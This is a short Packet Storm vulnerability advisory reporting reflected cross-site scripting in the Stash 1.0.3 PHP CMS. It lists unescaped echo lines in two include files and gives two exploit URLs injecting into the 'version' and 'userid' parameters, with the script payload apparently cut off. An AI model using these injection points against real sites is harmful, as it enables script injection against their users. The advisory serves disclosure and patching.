Stash 1.0.3 Cross Site Scripting

2009-12-30T00:00:00
ID PACKETSTORM:84407
Type packetstorm
Reporter Mr.SeCreT
Modified 2009-12-30T00:00:00

Description

                                        
                                            `###################### Author: #############################  
  
Author: Mr.SeCreT  
E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com>  
From: Syria  
http://english.islamweb.net/  
  
############## Script Information: #########################  
  
Script: Stash 1.0.3 Remote XSS Vulnerability  
Language: PHP  
Download: http://garr.dl.sourceforge.net/project/nice-stash/Stash%20CMS/1.0.3/stash-1.0.3.zip  
  
################### Vul Code: ##############################  
footer.inc.php:  
<?php echo $version; ?>  
<?php echo $userid ?>">My Info</a>  
<title><?php echo $pagetitle ?></title>  
  
header.inc.php:  
<?php echo $user ?>  
<?php echo $javascript ?>  
<?php echo $sitename ?>  
  
################### Exploit: ###############################  
  
www.site.com/path/admin/footer.inc.php?version=  
www.site.com/path/admin/footer.inc.php?userid=">  
  
############################################################  
  
`